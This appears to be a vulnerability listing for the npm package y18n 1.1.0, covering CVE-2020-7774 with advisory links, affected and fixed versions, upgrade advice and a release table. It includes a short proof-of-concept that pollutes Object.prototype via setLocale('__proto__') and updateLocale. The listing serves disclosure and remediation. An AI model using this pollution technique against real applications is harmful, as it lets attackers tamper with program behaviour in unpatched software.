NodeJS/y18n/1.1.0
the bare-bones internationalization library used by yargs
https://www.npmjs.com/package/y18n
ISC
1 Security Vulnerabilities
Prototype Pollution in y18n
Published date: 2021-03-29T16:05:12Z
CVE: CVE-2020-7774
Links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7774
- https://github.com/advisories/GHSA-c4w7-xm78-47vh
- https://github.com/yargs/y18n/issues/96
- https://github.com/yargs/y18n/pull/108
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
- https://snyk.io/vuln/SNYK-JS-Y18N-1021887
- https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
- https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3
Overview
The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
POC
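```js
const y18n = require('y18n')();
// The locale name is chosen to collide with the prototype accessor key.
y18n.setLocale('__proto__');
// Keys passed here are copied onto the object stored under that locale.
y18n.updateLocale({polluted: true});
console.log(polluted); // true
```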
Recommendation
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
Affected versions:
["5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "4.0.0", "1.0.0", "1.1.0", "2.0.0", "3.0.0", "3.1.0", "3.2.0", "3.2.1"]
Secure versions:
["6.0.0-alpha.0", "5.0.5", "4.0.1", "3.2.2", "5.0.6", "4.0.2", "5.0.7", "4.0.3", "5.0.8"]
Recommendation:
Update to version 5.0.8.
22 Other Versions
Version | License | Security | Released | Age |
---|---|---|---|---|
1.0.0 | ISC | 1 | 2015-07-27 - 07:19 | almost 9 years |
1.1.0 | ISC | 1 | 2015-07-28 - 04:15 | almost 9 years |
2.0.0 | ISC | 1 | 2015-07-28 - 05:07 | almost 9 years |
3.0.0 | ISC | 1 | 2015-07-29 - 07:35 | almost 9 years |
3.1.0 | ISC | 1 | 2015-08-18 - 22:01 | over 8 years |
3.2.0 | ISC | 1 | 2015-09-21 - 20:58 | over 8 years |
3.2.1 | ISC | 1 | 2016-03-17 - 05:04 | about 8 years |
4.0.0 | ISC | 1 | 2017-10-10 - 19:03 | over 6 years |
5.0.0 | ISC | 1 | 2020-09-05 - 02:35 | over 3 years |
5.0.1 | ISC | 1 | 2020-09-05 - 23:57 | over 3 years |
6.0.0-alpha.0 | ISC | | 2020-09-12 - 00:20 | over 3 years |
5.0.2 | ISC | 1 | 2020-10-01 - 18:23 | over 3 years |
5.0.3 | ISC | 1 | 2020-10-16 - 01:52 | over 3 years |
5.0.4 | ISC | 1 | 2020-10-16 - 15:44 | over 3 years |
5.0.5 | ISC | | 2020-10-25 - 15:18 | over 3 years |
4.0.1 | ISC | | 2020-11-30 - 23:43 | over 3 years |
3.2.2 | ISC | | 2021-01-04 - 22:47 | over 3 years |
5.0.6 | ISC | | 2021-04-05 - 01:26 | about 3 years |
4.0.2 | ISC | | 2021-04-07 - 01:45 | about 3 years |
5.0.7 | ISC | | 2021-04-07 - 01:46 | about 3 years |
4.0.3 | ISC | | 2021-04-07 - 18:05 | about 3 years |
5.0.8 | ISC | | 2021-04-07 - 18:57 | about 3 years |